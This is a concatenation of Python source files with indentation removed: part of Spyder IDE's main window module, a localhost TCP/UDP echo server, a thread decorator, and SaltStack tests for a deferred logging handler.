if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_
("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > General > Interface</tt>, "
"in case Spyder is not displayed correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
tcpudp.py
|
import socketserver
from multiprocessing import Process, Pool
import time
from concurrent.futures.thread import ThreadPoolExecutor
from concurrent.futures.process import ProcessPoolExecutor
class MyTCPHandler(socketserver.BaseRequestHandler):
"""
The request handler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
# self.request is the TCP socket connected to the client
print('tcp handler')
self.data = self.request.recv(1024).strip()
print("{} tcp handler wrote:".format(self.client_address[0]))
print(self.data)
# just send back the same data, but upper-cased
self.request.sendall(self.data.upper())
class MyUDPHandler(socketserver.BaseRequestHandler):
"""
This class works similar to the TCP handler class, except that
self.request consists of a pair of data and client socket, and since
there is no connection the client address must be given explicitly
when sending data back via sendto().
"""
def handle(self):
data = self.request[0].strip()
print('udp handler')
socket = self.request[1]
print("{} udphandler wrote:".format(self.client_address[0]))
print(data)
socket.sendto(data.lower(), self.client_address)
def tcp_task(host, port):
print(host, port)
server = socketserver.TCPServer((host, port), MyTCPHandler)
try:
print('start tcp server')
server.serve_forever()
except Exception as e:
print(e)
def udp_task(host, port):
print(host, port)
server = socketserver.UDPServer((host, port), MyUDPHandler)
try:
print('start udp server')
server.serve_forever()
except Exception as e:
print(e)
if __name__ == "__main__":
HOST, PORT = "127.0.0.1", 8888
executor = ThreadPoolExecutor()
# p1 = Process(target=tcp_task, args=(HOST, PORT,))
# p1.start()
a = executor.submit(tcp_task, HOST, PORT)
b = executor.submit(udp_task, HOST, PORT)
#
# p = Process(target=udp_task, args=(HOST, PORT,))
#
# p.start()
# p.join()
# with socketserver.UDPServer((HOST, PORT), MyUDPHandler) as server:
# print('start udp server')
# server.serve_forever()
# while True:
# time.sleep(1)
|
thread.py
|
from threading import Thread
def async_func(func):
def wrapper(*args, **kwargs):
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.start()
return wrapper
|
test_deferred_stream_handler.py
|
import logging
import multiprocessing
import signal
import subprocess
import sys
import time
import pytest
from salt._logging.handlers import DeferredStreamHandler
from salt.utils.nb_popen import NonBlockingPopen
from saltfactories.utils.processes import terminate_process
from tests.support.helpers import CaptureOutput, dedent
from tests.support.runtests import RUNTIME_VARS
log = logging.getLogger(__name__)
def _sync_with_handlers_proc_target():
with CaptureOutput() as stds:
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(message)s")
handler.setFormatter(formatter)
logging.root.addHandler(handler)
logger = logging.getLogger(__name__)
logger.info("Foo")
logger.info("Bar")
logging.root.removeHandler(handler)
assert not stds.stdout
assert not stds.stderr
stream_handler = logging.StreamHandler(sys.stderr)
# Sync with the other handlers
handler.sync_with_handlers([stream_handler])
assert not stds.stdout
assert stds.stderr == "Foo\nBar\n"
def _deferred_write_on_flush_proc_target():
with CaptureOutput() as stds:
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(message)s")
handler.setFormatter(formatter)
logging.root.addHandler(handler)
logger = logging.getLogger(__name__)
logger.info("Foo")
logger.info("Bar")
logging.root.removeHandler(handler)
assert not stds.stdout
assert not stds.stderr
# Flush the handler
handler.flush()
assert not stds.stdout
assert stds.stderr == "Foo\nBar\n"
def test_sync_with_handlers():
proc = multiprocessing.Process(target=_sync_with_handlers_proc_target)
proc.start()
proc.join()
assert proc.exitcode == 0
def test_deferred_write_on_flush():
proc = multiprocessing.Process(target=_deferred_write_on_flush_proc_target)
proc.start()
proc.join()
assert proc.exitcode == 0
def test_deferred_write_on_atexit(tmp_path):
# Python will .flush() and .close() all logging handlers at interpreter shutdown.
# This should be enough to flush our deferred messages.
pyscript = dedent(
r"""
import sys
import time
import logging
CODE_DIR = {!r}
if CODE_DIR in sys.path:
sys.path.remove(CODE_DIR)
sys.path.insert(0, CODE_DIR)
from salt._logging.handlers import DeferredStreamHandler
# Reset any logging handlers we might have already
logging.root.handlers[:] = []
handler = DeferredStreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
logging.root.addHandler(handler)
log = logging.getLogger(__name__)
sys.stdout.write('STARTED\n')
sys.stdout.flush()
log.debug('Foo')
sys.exit(0)
""".format(
RUNTIME_VARS.CODE_DIR
)
)
script_path = tmp_path / "atexit_deferred_logging_test.py"
script_path.write_text(pyscript, encoding="utf-8")
proc = NonBlockingPopen(
[sys.executable, str(script_path)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
out = b""
err = b""
# This test should never take more than 5 seconds
execution_time = 5
max_time = time.time() + execution_time
try:
# Just loop consuming output
while True:
if time.time() > max_time:
pytest.fail("Script didn't exit after {} second".format(execution_time))
time.sleep(0.125)
_out = proc.recv()
_err = proc.recv_err()
if _out:
out += _out
if _err:
err += _err
if _out is None and _err is None:
# The script exited
break
if proc.poll() is not None:
# The script exited
break
finally:
terminate_process(proc.pid, kill_children=True)
if b"Foo" not in err:
pytest.fail("'Foo' should be in stderr and it's not: {}".format(err))
